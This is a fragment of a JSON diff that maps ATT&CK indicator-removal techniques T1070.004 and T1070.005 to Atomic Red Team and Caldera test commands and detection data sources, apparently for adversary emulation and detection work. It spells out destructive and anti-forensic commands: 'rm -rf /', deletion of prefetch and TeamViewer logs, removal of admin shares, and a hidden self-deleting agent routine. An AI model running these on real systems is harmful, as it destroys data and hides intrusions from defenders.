This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1070.004", + "command_list": [ + "rm -f /tmp/victim-files/a\n", + "rm -rf /tmp/victim-files\n", + "shred -u /tmp/victim-shred.txt\n", + "del /f %temp%\\deleteme_T1551.004\n", + "rmdir /s /q %temp%\\deleteme_T1551.004\n", + "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", + "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", + "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path 
\"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "Remove-Item $env:TEMP\\TeamViewer_54.log\n", + "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", + "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n", + "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;" + ], + "commands": [ + { + "command": "rm -f /tmp/victim-files/a\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rm -rf /tmp/victim-files\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "shred -u /tmp/victim-shred.txt\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "del /f %temp%\\deleteme_T1551.004\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rmdir /s /q %temp%\\deleteme_T1551.004\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", + "source": 
"atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "Remove-Item $env:TEMP\\TeamViewer_54.log\n", + "source": "atomics/T1070.004/T1070.004.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: File Deletion" + }, + { + "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." 
+ }, + { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." + }, + { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;", + "source": "data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml", + "name": "Deadman ability to delete agent file after termination." + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.004", + "display_name": "Indicator Removal on Host: File Deletion", + "atomic_tests": [ + { + "name": "Delete a single file - Linux/macOS", + "auto_generated_guid": "562d737f-2fc6-4b09-8c2a-7f8ff0828480", + "description": "Delete a single file from the temporary directory\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "file_to_delete": { + "description": "Path of file to delete", + "type": "Path", + "default": "/tmp/victim-files/a" + } + }, + "executor": { + "command": "rm -f #{file_to_delete}\n", + "name": "sh" + } + }, + { + "name": "Delete an entire folder - Linux/macOS", + "auto_generated_guid": "a415f17e-ce8d-4ce2-a8b4-83b674e7017e", + "description": "Recursively delete the temporary directory and all files contained within it\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Path of folder to delete", + "type": "Path", + "default": "/tmp/victim-files" + } + }, + "executor": { + "command": "rm -rf #{folder_to_delete}\n", + "name": "sh" + } + }, + { + "name": "Overwrite and delete a file with shred", + "auto_generated_guid": 
"039b4b10-2900-404b-b67f-4b6d49aa6499", + "description": "Use the `shred` command to overwrite the temporary file and then delete it\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_shred": { + "description": "Path of file to shred", + "type": "Path", + "default": "/tmp/victim-shred.txt" + } + }, + "executor": { + "command": "shred -u #{file_to_shred}\n", + "name": "sh" + } + }, + { + "name": "Delete a single file - Windows cmd", + "auto_generated_guid": "861ea0b4-708a-4d17-848d-186c9c7f17e3", + "description": "Delete a single file from the temporary directory using cmd.exe.\nUpon execution, no output will be displayed. Use File Explorer to verify the file was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_delete": { + "description": "File to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "%temp%\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{file_to_delete})\n", + "prereq_command": "IF EXIST \"#{file_to_delete}\" ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo deleteme_T1551.004 >> #{file_to_delete}\n" + } + ], + "executor": { + "command": "del /f #{file_to_delete}\n", + "name": "command_prompt" + } + }, + { + "name": "Delete an entire folder - Windows cmd", + "auto_generated_guid": "ded937c4-2add-42f7-9c2c-c742b7a98698", + "description": "Recursively delete a folder in the temporary directory using cmd.exe.\nUpon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Folder to delete. 
Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "%temp%\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{folder_to_delete})\n", + "prereq_command": "IF EXIST \"#{folder_to_delete}\" ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{folder_to_delete}\n" + } + ], + "executor": { + "command": "rmdir /s /q #{folder_to_delete}\n", + "name": "command_prompt" + } + }, + { + "name": "Delete a single file - Windows PowerShell", + "auto_generated_guid": "9dee89bd-9a98-4c4f-9e2d-4256690b0e72", + "description": "Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_delete": { + "description": "File to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{file_to_delete})\n", + "prereq_command": "if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_to_delete} | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item -path #{file_to_delete}\n", + "name": "powershell" + } + }, + { + "name": "Delete an entire folder - Windows PowerShell", + "auto_generated_guid": "edd779e4-a509-4cba-8dfa-a112543dbfb1", + "description": "Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. 
Use File Explorer to verify the folder was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Folder to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\deleteme_folder_T1551.004" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The folder to delete must exist on disk at specified location (#{folder_to_delete})\n", + "prereq_command": "if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{folder_to_delete} -Type Directory | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item -Path #{folder_to_delete} -Recurse\n", + "name": "powershell" + } + }, + { + "name": "Delete Filesystem - Linux", + "auto_generated_guid": "f3aa95fe-4f10-4485-ad26-abf22a764c52", + "description": "This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "name": "bash" + } + }, + { + "name": "Delete Prefetch File", + "auto_generated_guid": "36f96049-0ad7-4a5f-8418-460acaeb92fb", + "description": "Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. 
To verify execution, Run \"(Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" | Measure-Object).Count\"\nbefore and after the test to verify that the number of prefetch files decreases by 1.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Delete TeamViewer Log Files", + "auto_generated_guid": "69f50a5f-967c-4327-a5bb-e1a9a9983785", + "description": "Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.\nThis test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer\nlog file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.\n\nhttps://twitter.com/SBousseaden/status/1197524463304290305?s=20\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "teamviewer_log_file": { + "description": "Teamviewer log file to delete. 
Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\TeamViewer_54.log" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The folder to delete must exist on disk at specified location (#{teamviewer_log_file})\n", + "prereq_command": "if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{teamviewer_log_file} | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item #{teamviewer_log_file}\n", + "name": "powershell" + } + } + ] + }, + { + "id": "4cd4eb44-29a7-4259-91ae-e457b283a880", + "name": "Delete payload", + "description": "Remove a downloaded payload file", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.004", + "name": "Indicator Removal on Host: File Deletion" + }, + "platforms": { + "darwin": { + "sh": { + "cleanup": "rm #{payload}\n" + } + }, + "linux": { + "sh": { + "cleanup": "rm #{payload}\n" + } + }, + "windows": { + "psh,pwsh": { + "cleanup": "Remove-Item -Force -Path \"#{payload}\"" + } + } + } + }, + { + "id": "5f844ac9-5f24-4196-a70d-17f0bd44a934", + "name": "Deadman - Delete agent file", + "description": "Deadman ability to delete agent file after termination.", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.004", + "name": "Indicator Removal on Host: File Deletion" + }, + "platforms": { + "windows": { + "psh": { + "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n" + } + }, + "darwin": { + "sh": { + "command": 
"path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n" + } + }, + "linux": { + "sh": { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, 
+ { + "technique_id": "T1070.005", + "command_list": [ + "net use c: \\\\test\\share\nnet share test=\\\\test\\share /REMARK:\"test share\" /CACHE:No\n", + "net share \\\\test\\share /delete\n", + "Remove-SmbShare -Name \\\\test\\share\nRemove-FileShare -Name \\\\test\\share\n", + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "for %i in (C$ IPC$ ADMIN$) do net share %i /delete" + ], + "commands": [ + { + "command": "net use c: \\\\test\\share\nnet share test=\\\\test\\share /REMARK:\"test share\" /CACHE:No\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "net share \\\\test\\share /delete\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "Remove-SmbShare -Name \\\\test\\share\nRemove-FileShare -Name \\\\test\\share\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "for %i in (C$ IPC$ ADMIN$) do net share %i /delete", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + } + 
], + "parsed_datasets": [ + { + "attack_technique": "T1070.005", + "display_name": "Indicator Removal on Host: Network Share Connection Removal", + "atomic_tests": [ + { + "name": "Add Network Share", + "auto_generated_guid": "14c38f32-6509-46d8-ab43-d53e32d2b131", + "description": "Add a Network Share utilizing the command_prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to add.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "net use c: #{share_name}\nnet share test=#{share_name} /REMARK:\"test share\" /CACHE:No\n", + "name": "command_prompt" + } + }, + { + "name": "Remove Network Share", + "auto_generated_guid": "09210ad5-1ef2-4077-9ad3-7351e13e9222", + "description": "Removes a Network Share utilizing the command_prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to remove.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "net share #{share_name} /delete\n", + "name": "command_prompt" + } + }, + { + "name": "Remove Network Share PowerShell", + "auto_generated_guid": "0512d214-9512-4d22-bde7-f37e058259b3", + "description": "Removes a Network Share utilizing PowerShell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to remove.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "Remove-SmbShare -Name #{share_name}\nRemove-FileShare -Name #{share_name}\n", + "name": "powershell" + } + }, + { + "name": "Disable Administrative Share Creation at Startup", + "auto_generated_guid": "99c657aa-ebeb-4179-a665-69288fdd12b8", + "description": "Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators \nremote access to every disk volume on a network-connected system. 
These shares are automatically created at started unless they have been\npurposefully disabled and is done in this Atomic test. As Microsoft puts it, \"Missing administrative shares typically \nindicate that the computer in question has been compromised by malicious software.\"\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /f\nreg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Remove Administrative Shares", + "auto_generated_guid": "4299eff5-90f1-4446-b2f3-7f4f5cfd5d62", + "description": "Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators \nremote access to every disk volume on a network-connected system. 
As Microsoft puts it, \u201cMissing administrative shares typically \nindicate that the computer in question has been compromised by malicious software.\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "for %i in (C$ IPC$ ADMIN$) do net share %i /delete", + "cleanup_command": "net share ADMIN$ /UNLIMITED >nul 2>&1\nnet share C$=C:\\ >nul 2>&1\nnet share IPC$ >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about 
commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
